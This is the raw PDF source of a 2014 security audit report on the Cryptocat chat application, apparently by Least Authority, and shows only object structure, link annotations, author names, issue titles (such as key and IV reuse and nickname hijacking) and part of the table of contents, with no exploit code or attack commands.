0 0 ] /Rect [ 420.7247 636.7736 501.2947 648.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER90': class PDFDictionary 116 0 obj << /A << /S /URI /Type /Action /URI (https://github.com/cryptocat/cryptocat/wiki/OTR-Encrypted-File-Transfer-Specification) >> /Border [ 0 0 0 ] /Rect [ 85.69291 288.7736 463.0229 300.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER91': class PDFDictionary 117 0 obj << /A << /S /URI /Type /Action /URI (https://github.com/strophe/strophejs/issues/35) >> /Border [ 0 0 0 ] /Rect [ 85.69291 162.7736 289.1229 174.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER92': class LinkAnnotation 118 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 91 0 R /XYZ 62.69291 768.0236 0 ] /Rect [ 268.6259 150.7736 532.0308 162.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER93': class LinkAnnotation 119 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 91 0 R /XYZ 62.69291 768.0236 0 ] /Rect [ 85.69291 138.7736 148.4929 150.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER94': class LinkAnnotation 120 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 139 0 R /XYZ 62.69291 768.5236 0 ] /Rect [ 172.7429 120.7736 276.4628 132.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Page19': class PDFPage 121 0 obj % Page dictionary << /Annots [ 115 0 R 116 0 R 117 0 R 118 0 R 119 0 R 120 0 R ] /Contents 196 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 177 0 R /Resources <> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Annot.NUMBER95': class LinkAnnotation 122 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 114 0 R /XYZ 62.69291 213.0236 0 ] /Rect [ 508.1227 369.7736 531.0133 381.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER96': class LinkAnnotation 123 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 114 0 R /XYZ 62.69291 213.0236 0 ] /Rect [ 85.69291 357.7736 190.9209 369.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Page20': class PDFPage 124 0 obj % Page dictionary << /Annots [ 122 0 R 123 0 R ] /Contents 197 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 177 0 R /Resources <> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Annot.NUMBER97': class LinkAnnotation 125 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 99 0 R /XYZ 62.69291 768.0236 0 ] /Rect [ 201.0734 651.7736 530.8486 663.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER98': class LinkAnnotation 126 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 99 0 R /XYZ 62.69291 768.0236 0 ] /Rect [ 85.69291 639.7736 236.3029 651.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER99': class LinkAnnotation 127 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 99 0 R /XYZ 62.69291 768.0236 0 ] /Rect [ 311.7559 579.7736 531.3308 591.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER100': class LinkAnnotation 128 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 99 0 R /XYZ 62.69291 768.0236 0 ] /Rect [ 85.69291 567.7736 337.4429 579.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER101': class LinkAnnotation 129 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 83 0 R /XYZ 62.69291 735.0236 0 ] /Rect [ 495.3527 198.7736 531.4827 210.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER102': class LinkAnnotation 130 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 83 0 R /XYZ 62.69291 735.0236 0 ] /Rect [ 108.6929 186.7736 378.5781 198.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER103': class LinkAnnotation 131 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 86 0 R /XYZ 62.69291 768.0236 0 ] /Rect [ 399.4322 186.7736 531.1886 198.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER104': class LinkAnnotation 132 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 86 0 R /XYZ 62.69291 768.0236 0 ] /Rect [ 108.6929 174.7736 207.0529 186.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Page21': class PDFPage 133 0 obj % Page dictionary << /Annots [ 125 0 R 126 0 R 127 0 R 128 0 R 129 0 R 130 0 R 131 0 R 132 0 R ] /Contents 198 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 177 0 R /Resources <> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Page22': class PDFPage 134 0 obj % Page dictionary << /Contents 199 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 177 0 R /Resources <> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Page23': class PDFPage 135 0 obj % Page dictionary << /Contents 200 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 177 0 R /Resources <> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Page24': class PDFPage 136 0 obj % Page dictionary << /Contents 201 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 177 0 R /Resources <> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Annot.NUMBER105': class PDFDictionary 137 0 obj << /A << /S /URI /Type /Action /URI (https://github.com/cryptocat/cryptocat/issues/500) >> /Border [ 0 0 0 ] /Rect [ 62.69291 714.7736 108.8329 726.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER106': class PDFDictionary 138 0 obj << /A << /S /URI /Type /Action /URI (https://github.com/cryptocat/cryptocat/wiki/OTR-Encrypted-File-Transfer-Specification) >> /Border [ 0 0 0 ] /Rect [ 135.9329 384.7736 284.3029 396.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Page25': class PDFPage 139 0 obj % Page dictionary << /Annots [ 137 0 R 138 0 R ] /Contents 202 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 177 0 R /Resources <> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Annot.NUMBER107': class PDFDictionary 140 0 obj << /A << /S /URI /Type /Action /URI (https://github.com/arlolra/otr/issues/41) >> /Border [ 0 0 0 ] /Rect [ 441.4129 714.7736 503.1029 726.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Page26': class PDFPage 141 0 obj % Page dictionary << /Annots [ 140 0 R ] /Contents 203 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 177 0 R /Resources <> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Page27': class PDFPage 142 0 obj % Page dictionary << /Contents 204 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 177 0 R /Resources <> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'R143': class PDFCatalog 143 0 obj % Document Root << /Outlines 145 0 R /PageLabels 205 0 R /PageMode /UseNone /Pages 177 0 R /Type /Catalog >> endobj % 'R144': class PDFInfo 144 0 obj << /Author () /CreationDate (D:20140126220900+00'00') /Creator ($unspecified$) /Keywords () /Producer (ReportLab PDF Library - www.reportlab.com) /Subject ($unspecified$) /Title (Report of Security Audit of Cryptocat) >> endobj % 'R145': class PDFOutlines 145 0 obj << /Count 39 /First 146 0 R /Last 176 0 R /Type /Outlines >> endobj % 'Outline.0': class OutlineEntryObject 146 0 obj << /Count 3 /Dest [ 77 0 R /XYZ 62.69291 156.0236 0 ] /First 147 0 R /Last 148 0 R /Next 150 0 R /Parent 145 0 R /Title (Overview) >> endobj % 'Outline.32.0': class OutlineEntryObject 147 0 obj << /Dest [ 82 0 R /XYZ 62.69291 741.0236 0 ] /Next 148 0 R /Parent 146 0 R /Title (Audit Scope) >> endobj % 'Outline.32.1': class OutlineEntryObject 148 0 obj << /Count 1 /Dest [ 82 0 R /XYZ 62.69291 597.0236 0 ] /First 149 0 R /Last 149 0 R /Parent 146 0 R /Prev 147 0 R /Title (Coverage) >> endobj % 'Outline.33.0': class OutlineEntryObject 149 0 obj << /Dest [ 82 0 R /XYZ 62.69291 333.0236 0 ] /Parent 148 0 R /Title (Target Code and Revision) >> endobj % 'Outline.1': class OutlineEntryObject 150 0 obj << /Count 14 /Dest [ 83 0 R /XYZ 62.69291 765.0236 0 ] /First 151 0 R /Last 163 0 R /Next 165 0 R /Parent 145 0 R /Prev 146 0 R /Title (Findings) >> endobj % 'Outline.34.0': class OutlineEntryObject 151 0 obj << /Dest [ 83 0 R /XYZ 62.69291 732.0236 0 ] /Next 152 0 R /Parent 150 0 R /Title (Issue A. Disclosure of File Contents Due to Re-use Of Key and IV) >> endobj % 'Outline.34.1': class OutlineEntryObject 152 0 obj << /Dest [ 86 0 R /XYZ 62.69291 765.0236 0 ] /Next 153 0 R /Parent 150 0 R /Prev 151 0 R /Title (Issue B. Integrity Key and IV Reuse in File Transfer) >> endobj % 'Outline.34.2': class OutlineEntryObject 153 0 obj << /Dest [ 88 0 R /XYZ 62.69291 765.0236 0 ] /Next 154 0 R /Parent 150 0 R /Prev 152 0 R /Title (Mitigation for Issues A and B) >> endobj % 'Outline.34.3': class OutlineEntryObject 154 0 obj << /Count 3 /Dest [ 88 0 R /XYZ 62.69291 471.0236 0 ] /First 155 0 R /Last 157 0 R /Next 158 0 R /Parent 150 0 R /Prev 153 0 R /Title (Remediation for Issues A and B) >> endobj % 'Outline.35.0': class OutlineEntryObject 155 0 obj << /Dest [ 88 0 R /XYZ 62.69291 315.0236 0 ] /Next 156 0 R /Parent 154 0 R /Title (Versioning) >> endobj % 'Outline.35.1': class OutlineEntryObject 156 0 obj << /Dest [ 90 0 R /XYZ 62.69291 765.0236 0 ] /Next 157 0 R /Parent 154 0 R /Prev 155 0 R /Title (Generate per-file keys) >> endobj % 'Outline.35.2': class OutlineEntryObject 157 0 obj << /Dest [ 90 0 R /XYZ 62.69291 468.8236 0 ] /Parent 154 0 R /Prev 156 0 R /Title (New standard file transfer protocol) >> endobj % 'Outline.34.4': class OutlineEntryObject 158 0 obj << /Dest [ 91 0 R /XYZ 62.69291 765.0236 0 ] /Next 159 0 R /Parent 150 0 R /Prev 154 0 R /Title (Issue C. Substitution of File Contents By Hijacking Entry in User Interface) >> endobj % 'Outline.34.5': class OutlineEntryObject 159 0 obj << /Dest [ 98 0 R /XYZ 62.69291 765.0236 0 ] /Next 160 0 R /Parent 150 0 R /Prev 158 0 R /Title (Issue D. File Name, Mimetype, and Size Lack Confidentiality) >> endobj % 'Outline.34.6': class OutlineEntryObject 160 0 obj << /Dest [ 99 0 R /XYZ 62.69291 765.0236 0 ] /Next 161 0 R /Parent 150 0 R /Prev 159 0 R /Title (Issue E. You Log Out, Attacker Logs in with the same Nickname, Your Friend Thinks The Attacker is You) >> endobj % 'Outline.34.7': class OutlineEntryObject 161 0 obj << /Dest [ 103 0 R /XYZ 62.69291 765.0236 0 ] /Next 162 0 R /Parent 150 0 R /Prev 160 0 R /Title (Issue F. Nicknames Can Be Invisibly Reassigned) >> endobj % 'Outline.34.8': class OutlineEntryObject 162 0 obj << /Dest [ 106 0 R /XYZ 62.69291 765.0236 0 ] /Next 163 0 R /Parent 150 0 R /Prev 161 0 R /Title (Issue G. Capture of Sent Messages by Nickname Change) >> endobj % 'Outline.34.9': class OutlineEntryObject 163 0 obj << /Count 1 /Dest [ 110 0 R /XYZ 62.69291 765.0236 0 ] /First 164 0 R /Last 164 0 R /Parent 150 0 R /Prev 162 0 R /Title (Issues Without Known Exploits) >> endobj % 'Outline.36.0': class OutlineEntryObject 164 0 obj << /Dest [ 110 0 R /XYZ 62.69291 693.0236 0 ] /Parent 163 0 R /Title (CTR-mode Overflow) >> endobj % 'Outline.2': class OutlineEntryObject 165 0 obj << /Count 6 /Dest [ 114 0 R /XYZ 62.69291 765.0236 0 ] /First 166 0 R /Last 171 0 R /Next 172 0 R /Parent 145 0 R /Prev 150 0 R /Title (Future Work) >> endobj % 'Outline.37.0': class OutlineEntryObject 166 0 obj << /Count 4 /Dest [ 114 0 R /XYZ 62.69291 732.0236 0 ] /First 167 0 R /Last 170 0 R /Next 171 0 R /Parent 165 0 R /Title (Protocol Analysis, Design, and Implementation) >> endobj % 'Outline.38.0': class OutlineEntryObject 167 0 obj << /Dest [ 114 0 R /XYZ 62.69291 660.0236 0 ] /Next 168 0 R /Parent 166 0 R /Title (Multiparty Chat) >> endobj % 'Outline.38.1': class OutlineEntryObject 168 0 obj << /Dest [ 114 0 R /XYZ 62.69291 459.0236 0 ] /Next 169 0 R /Parent 166 0 R /Prev 167 0 R /Title (File Transfer) >> endobj % 'Outline.38.2': class OutlineEntryObject 169 0 obj << /Dest [ 114 0 R /XYZ 62.69291 378.0236 0 ] /Next 170 0 R /Parent 166 0 R /Prev 168 0 R /Title (OTR & Cryptographic Libraries) >> endobj % 'Outline.38.3': class OutlineEntryObject 170 0 obj << /Dest [ 114 0 R /XYZ 62.69291 309.0236 0 ] /Parent 166 0 R /Prev 169 0 R /Title (JavaScript Cryptography) >> endobj % 'Outline.37.1': class OutlineEntryObject 171 0 obj << /Dest [ 114 0 R /XYZ 62.69291 210.0236 0 ] /Parent 165 0 R /Prev 166 0 R /Title (Open Questions & Concerns) >> endobj % 'Outline.3': class OutlineEntryObject 172 0 obj << /Count 1 /Dest [ 124 0 R /XYZ 62.69291 765.0236 0 ] /First 173 0 R /Last 173 0 R /Next 174 0 R /Parent 145 0 R /Prev 165 0 R /Title (Recommendations) >> endobj % 'Outline.39.0': class OutlineEntryObject 173 0 obj << /Dest [ 124 0 R /XYZ 62.69291 732.0236 0 ] /Parent 172 0 R /Title (Coding Practices) >> endobj % 'Outline.4': class OutlineEntryObject 174 0 obj << /Dest [ 133 0 R /XYZ 62.69291 765.0236 0 ] /Next 175 0 R /Parent 145 0 R /Prev 172 0 R /Title (Appendix A: The life cycle of the Cryptocat file transfer) >> endobj % 'Outline.5': class OutlineEntryObject 175 0 obj << /Dest [ 139 0 R /XYZ 62.69291 765.0236 0 ] /Next 176 0 R /Parent 145 0 R /Prev 174 0 R /Title (Appendix B: Work Log) >> endobj % 'Outline.6': class OutlineEntryObject 176 0 obj << /Dest [ 142 0 R /XYZ 62.69291 765.0236 0 ] /Parent 145 0 R /Prev 175 0 R /Title (Appendix C: Exploit Code for Issue G) >> endobj % 'R177': class PDFPages 177 0 obj % page tree << /Count 27 /Kids [ 8 0 R 77 0 R 82 0 R 83 0 R 85 0 R 86 0 R 88 0 R 90 0 R 91 0 R 95 0 R 98 0 R 99 0 R 102 0 R 103 0 R 106 0 R 109 0 R 110 0 R 114 0 R 121 0 R 124 0 R 133 0 R 134 0 R 135 0 R 136 0 R 139 0 R 141 0 R 142 0 R ] /Type /Pages >> endobj % 'R178': class PDFStream 178 0 obj % page stream << /Length 2108 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 741.0236 cm q 0 0 0 rg BT 1 0 0 1 0 4 Tm /F2 20 Tf 24 TL 58.26488 0 Td (Report of Security Audit of Cryptocat) Tj T* -58.26488 0 Td ET Q Q q 1 0 0 1 62.69291 725.0236 cm Q q 1 0 0 1 62.69291 725.0236 cm Q q 1 0 0 1 62.69291 641.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 69 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 69 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Principal Investigators:) Tj T* ET Q Q q 1 0 0 1 23 63 cm Q q 1 0 0 1 23 63 cm Q q 1 0 0 1 23 51 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Nathan Wilcox <) Tj 0 0 .501961 rg (nathan@LeastAuthority.com) Tj 0 0 0 rg (>) Tj T* ET Q Q q Q Q q 1 0 0 1 23 45 cm Q q 1 0 0 1 23 33 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Zooko Wilcox-O'Hearn <) Tj 0 0 .501961 rg (zooko@LeastAuthority.com) Tj 0 0 0 rg (>) Tj T* ET Q Q q Q Q q 1 0 0 1 23 27 cm Q q 1 0 0 1 23 15 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Daira Hopwood <) Tj 0 0 .501961 rg (daira@LeastAuthority.com) Tj 0 0 0 rg (>) Tj T* ET Q Q q Q Q q 1 0 0 1 23 9 cm Q q 1 0 0 1 23 -3 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Darius Bacon <) Tj 0 0 .501961 rg (darius@LeastAuthority.com) Tj 0 0 0 rg (>) Tj T* ET Q Q q Q Q q 1 0 0 1 23 -3 cm Q q Q Q q 1 0 0 1 62.69291 641.0236 cm Q endstream endobj % 'R179': class PDFStream 179 0 obj % page stream << /Length 9107 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 744.0236 cm q BT 1 0 0 1 0 3.5 Tm 21 TL /F2 17.5 Tf 0 0 0 rg (Contents) Tj T* ET Q Q q 1 0 0 1 62.69291 168.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 0 555 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 .501961 rg (Overview) Tj T* ET Q Q q 1 0 0 1 397.8898 555 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL 66.44 0 Td (2) Tj T* -66.44 0 Td ET Q Q q 1 0 0 1 0 537 cm q BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Audit Scope) Tj T* ET Q Q q 1 0 0 1 397.8898 537 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 66.44 0 Td (3) Tj T* -66.44 0 Td ET Q Q q 1 0 0 1 0 519 cm q BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Coverage) Tj T* ET Q Q q 1 0 0 1 397.8898 519 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 66.44 0 Td (3) Tj T* -66.44 0 Td ET Q Q q 1 0 0 1 0 501 cm q BT 1 0 0 1 40 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Target Code and Revision) Tj T* ET Q Q q 1 0 0 1 397.8898 501 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 66.44 0 Td (3) Tj T* -66.44 0 Td ET Q Q q 1 0 0 1 0 483 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 .501961 rg (Findings) Tj T* ET Q Q q 1 0 0 1 397.8898 483 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL 66.44 0 Td (4) Tj T* -66.44 0 Td ET Q Q q 1 0 0 1 0 465 cm q BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Issue A. Disclosure of File Contents Due to Re-use Of Key and IV) Tj T* ET Q Q q 1 0 0 1 397.8898 465 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 66.44 0 Td (4) Tj T* -66.44 0 Td ET Q Q q 1 0 0 1 0 447 cm q BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Issue B. Integrity Key and IV Reuse in File Transfer) Tj T* ET Q Q q 1 0 0 1 397.8898 447 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 66.44 0 Td (6) Tj T* -66.44 0 Td ET Q Q q 1 0 0 1 0 429 cm q BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Mitigation for Issues A and B) Tj T* ET Q Q q 1 0 0 1 397.8898 429 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 66.44 0 Td (7) Tj T* -66.44 0 Td ET Q Q q 1 0 0 1 0 411 cm q BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Remediation for Issues A and B) Tj T* ET Q Q q 1 0 0 1 397.8898 411 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 66.44 0 Td (7) Tj T* -66.44 0 Td ET Q Q q 1 0 0 1 0 393 cm q BT 1 0 0 1 40 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Versioning) Tj T* ET Q Q q 1 0 0 1 397.8898 393 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 66.44 0 Td (7) Tj T* -66.44 0 Td ET Q Q q 1 0 0 1 0 375 cm q BT 1 0 0 1 40 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Generate per-file keys) Tj T* ET Q Q q 1 0 0 1 397.8898 375 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 66.44 0 Td (8) Tj T* -66.44 0 Td ET Q Q q 1 0 0 1 0 357 cm q BT 1 0 0 1 40 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (New standard file transfer protocol) Tj T* ET Q Q q 1 0 0 1 397.8898 357 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 66.44 0 Td (8) Tj T* -66.44 0 Td ET Q Q q 1 0 0 1 0 339 cm q BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Issue C. Substitution of File Contents By Hijacking Entry in User Interface) Tj T* ET Q Q q 1 0 0 1 397.8898 339 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 66.44 0 Td (9) Tj T* -66.44 0 Td ET Q Q q 1 0 0 1 0 321 cm q BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Issue D. File Name, Mimetype, and Size Lack Confidentiality) Tj T* ET Q Q q 1 0 0 1 397.8898 321 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (11) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 291 cm q BT 1 0 0 1 20 14 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Issue E. You Log Out, Attacker Logs in with the same Nickname, Your Friend Thinks) Tj T* (The Attacker is You) Tj T* ET Q Q q 1 0 0 1 397.8898 303 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (12) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 273 cm q BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Issue F. Nicknames Can Be Invisibly Reassigned) Tj T* ET Q Q q 1 0 0 1 397.8898 273 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (14) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 255 cm q BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Issue G. Capture of Sent Messages by Nickname Change) Tj T* ET Q Q q 1 0 0 1 397.8898 255 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (15) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 237 cm q BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Issues Without Known Exploits) Tj T* ET Q Q q 1 0 0 1 397.8898 237 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (17) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 219 cm q BT 1 0 0 1 40 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (CTR-mode Overflow) Tj T* ET Q Q q 1 0 0 1 397.8898 219 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (17) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 201 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 .501961 rg (Future Work) Tj T* ET Q Q q 1 0 0 1 397.8898 201 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL 60.88 0 Td (18) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 183 cm q BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Protocol Analysis, Design, and Implementation) Tj T* ET Q Q q 1 0 0 1 397.8898 183 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (18) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 165 cm q BT 1 0 0 1 40 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Multiparty Chat) Tj T* ET Q Q q 1 0 0 1 397.8898 165 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (18) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 147 cm q BT 1 0 0 1 40 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (File Transfer) Tj T* ET Q Q q 1 0 0 1 397.8898 147 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (18) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 129 cm q BT 1 0 0 1 40 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (OTR & Cryptographic Libraries) Tj T* ET Q Q q 1 0 0 1 397.8898 129 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (18) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 111 cm q BT 1 0 0 1 40 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (JavaScript Cryptography) Tj T* ET Q Q q 1 0 0 1 397.8898 111 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (18) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 93 cm q BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Open Questions & Concerns) Tj T* ET Q Q q 1 0 0 1 397.8898 93 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (18) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 75 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 .501961 rg (Recommendations) Tj T* ET Q Q q 1 0 0 1 397.8898 75 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL 60.88 0 Td (20) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 57 cm q BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Coding Practices) Tj T* ET Q Q q 1 0 0 1 397.8898 57 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (20) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 39 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 .501961 rg (Appendix A: The life cycle of the Cryptocat file transfer) Tj T* ET Q Q q 1 0 0 1 397.8898 39 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL 60.88 0 Td (21) Tj T* 